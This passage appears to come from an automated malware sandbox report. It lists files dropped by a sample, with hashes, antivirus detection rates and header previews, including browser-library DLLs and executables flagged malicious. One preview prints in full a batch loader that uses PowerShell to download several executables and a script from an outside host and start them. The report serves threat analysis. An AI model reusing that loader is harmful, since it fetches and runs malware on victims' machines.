SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\tiktok[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	545792
Entropy (8bit):	6.384805269039956
Encrypted:	false
SSDEEP:	6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
MD5:	6C93FC68E2F01C20FB81AF24470B790C
SHA1:	D5927B38A32E30AFCF5A658612A8266476FC4AD8
SHA-256:	64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
SHA-512:	355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47% Antivirus: Virustotal, Detection: 51%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\load[1].bat

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	693
Entropy (8bit):	5.52306618115351
Encrypted:	false
SSDEEP:	12:/kCX80qwTwXp2NO980qwTwXEbHDS8YGCiZL+MUAwwTwX2RCX80qwTwXJE:MeiZ2NoiUbHPRL+MUzmoiZE
MD5:	B3370DB0FABEB3A7D6A9221F5B03D984
SHA1:	1834CE744A9498810C1964144662F3260A3CB3F8
SHA-256:	A222779606D0CED41E7466AA8AC266B9774F96E4F46DDF349D4CE4FA5E0A1CB1
SHA-512:	FD3D42DDEC767A846158DFEBED8A887367194B2EB994DB251B1DCD4A4463616A2A08E98B0D3712D0ACF017242270129468D52C0496103FFF44EE3B3EA1E08BEF
Malicious:	false
Reputation:	unknown
Preview:	@ECHO OFF..cd %TEMP%..powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"..powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"..START i1.exe /SUB=2838 /str=one..powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"..START i2.bat..cd %TEMP%..powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')"..START i3.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\3cf7150

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1514213
Entropy (8bit):	7.760258988286453
Encrypted:	false
SSDEEP:	24576:2j/90C+h3cEnea9Q1QjEceGvAhXGbbn+gYVtQ5qRfAdvPcI7xYAKZ1vb:mT4R5yQjEcHaGn+gYbQrnczvZ1vb
MD5:	65C6DD149EA35199281958C2E8C9C8F9
SHA1:	EBD01045CBFF0543DDA1309FB85C006A70FF645A
SHA-256:	37653B1DB9A27FFE1EAFD3FB0D6F8E85822BCAF5C7BE73E01E982EDBCABA7541
SHA-512:	73E2A8F7C35A06541F496076019F0F43E1B2546E3B4EA0B71C25741A1D2A72DFD027A38F07C320A7041B94277B4C69BB253BABAA1A9EB055853CCFFF2A12FB59
Malicious:	false
Reputation:	unknown
Preview:	...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F../F.L~..Lz..Qc/..A5.kZ..d@".z]..yO4.-c#.xr..bI4.`]..yO4.x^F...F...F...F...F...F...F...F...F...F...F...F.bg(.yG'.dT#.u.F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F.bm4.lZ#.c]2.cM#...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F.Zg..D\|c.@G%.b]).y...Yr..lC#.b\-...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F...F.?.v.8.q.:.F...F...F...F...F...F...F...F...F...F...F

C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\ApproveChildRequest.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\i3.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	253952
Entropy (8bit):	6.460805669210432
Encrypted:	false
SSDEEP:	6144:wi/t3IYcL8xahSmetqxIYVBqa2nfRGKdDPDvV:wi/SxLcahSmepYVtcnjDt
MD5:	078E4AB454C2B09E5EF3DA8DC7B2EC81
SHA1:	A9789E12CDF694A0791DD7B73288509DCE0E2EA1
SHA-256:	6C2FA3C67D77A6704A7E90BF5A3F0915B56FD043FDFCFB9DA438D16A2C656C66
SHA-512:	A1D1027776D3F78D35280D6CDF46B18A76CC0E8FFFADE17B32EFF0675FD5CE64AD012AD33EFFC72D144A9D002AC16C8E66C4B09A328E364A5F7562EB09211CBB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u...u...u......u...q...u...v...u...p...u...t...u...t...u...}...u.......u.......u...w...u.Rich..u.................PE..d.....T..........."......`...p.......G.........@.....................................c....`.......... ...................................... ........P...t...0..,.......................T...........................`y..@............z...............................text....X.......`.................. ..`.rdata......p.......p..............@..@.data... ........0..................@....pdata..,....0... ...0..............@..@.rsrc....t...P.......P..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\i3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6749184
Entropy (8bit):	7.789220407191343
Encrypted:	false
SSDEEP:	196608:FL4X13u2HKA5q6G/Ne+XaiFh6cCClKPjj79:FL/As6G0+TGbH
MD5:	90487EB500021DBCB9443A2CF972A204
SHA1:	62AE31665D462C8E5D6632F389B1E94AFB9BF00D
SHA-256:	4A86CA84B985A5228ECCD13F225BB403E9574E7F64B900A9ACC4D32BCB732FF2
SHA-512:	8CB3B1AE44246BEE8BF2B81220D7A5782C4E82B2B871A81BDC9EA170FBE477D7BE59C3543554F2CDEFDE7422BCC88B6624B966DFF1603C79D277329FB2074D17
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29% Antivirus: Virustotal, Detection: 31%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`d.T...T...T...YS..L...YS..%...YS..\|......E...T..........Y......U...RichT...........................PE..L....{.`......................_...................@..........................@g......5g...@.................................4.f......0g.......................g.......................................f.@.............f.4............................text...E........................... ..`.data....H_......(_.................@....idata........f.......f.............@..@.GIU..........f.......f.............@....reloc........g.......f.............@..B.rsrc........0g.......f.............@..@........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\WMSysPr9.prx

Download File

Process:	C:\Users\user\AppData\Local\Temp\i3.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	316640
Entropy (8bit):	2.9813595659741643
Encrypted:	false
SSDEEP:	768:dfQWPE1EdGK6LK5Sj5zDWPEKjoT7tEYTDiDtcBXQ:aWP3P6LK5SVWPuT7tEYTDUcBXQ
MD5:	E7E4D8D7340DA6934B9EA81CBB21374C
SHA1:	B0B24E36351258444768769F48CC3505B957D460
SHA-256:	45A572F3DEA4F20E077D1162A77BD0922E5B52FC679BEF0C05425FBD14E7A108
SHA-512:	2832E66BA0964A44CE3ECD6B7B6349529E3E284E78AF3E7B6481276F1890B7D6DE1B52A03150DD6BF0610F8E30B4AF6B0B323EA59D88C156FCF1B46B2A07FD3A
Malicious:	false
Reputation:	unknown
Preview:	..<.P.R.X.>......... . . . .<.p.r.o.f.i.l.e. .v.e.r.s.i.o.n.=.".4.5.8.7.5.2.". ..... . . . . . . . . . . . . .n.a.m.e.=.".V.i.d.e.o. .f.o.r. .d.i.a.l.-.u.p. .m.o.d.e.m.s. .o.r. .s.i.n.g.l.e. .c.h.a.n.n.e.l. .I.S.D.N. .(.2.8...8. .t.o. .5.6. .K.b.p.s.).". ..... . . . . . . . . . . . . .g.u.i.d.=.".{.5.B.1.6.E.7.4.B.-.4.0.6.8.-.4.5.B.5.-.B.8.0.E.-.7.B.F.8.C.8.0.D.2.C.2.F.}."..... . . . . . . . . . . . . .d.e.s.c.r.i.p.t.i.o.n.=.".U.s.e. .t.h.i.s. .m.u.l.t.i.p.l.e. .b.i.t. .r.a.t.e. .p.r.o.f.i.l.e. .f.o.r. .t.a.r.g.e.t. .a.u.d.i.e.n.c.e.s. .w.i.t.h. .a. .d.i.a.l.-.u.p. .m.o.d.e.m. .o.r. .s.i.n.g.l.e. .c.h.a.n.n.e.l. .I.S.D.N. .c.o.n.n.e.c.t.i.o.n. .(.b.a.n.d.w.i.d.t.h. .i.s. .b.e.t.w.e.e.n. .2.8...8. .K.b.p.s. .a.n.d. .5.6. .K.b.p.s.)...".>. ..... . . . . .<.s.t.r.e.a.m.c.o.n.f.i.g. .m.a.j.o.r.t.y.p.e.=.".{.7.3.6.4.7.5.6.1.-.0.0.0.0.-.0.0.1.0.-.8.0.0.0.-.0.0.A.A.0.0.3.8.9.B.7.1.}.". ..... . . . . . . . . . . . . . . . . . . .s.t.r.e.a.m.n.u.m.b.e.r.=.".1.". ..... . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\EHJDHJKFIE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	545792
Entropy (8bit):	6.384805269039956
Encrypted:	false
SSDEEP:	6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
MD5:	6C93FC68E2F01C20FB81AF24470B790C
SHA1:	D5927B38A32E30AFCF5A658612A8266476FC4AD8
SHA-256:	64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
SHA-512:	355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47% Antivirus: Virustotal, Detection: 51%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wqh1tun.oqa.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5sboifax.kbo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cd4zkgva.moy.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ii4ymyyt.aw4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmuh1pmj.nrk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2zltvm2.0lw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_orzkbwwe.ro0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
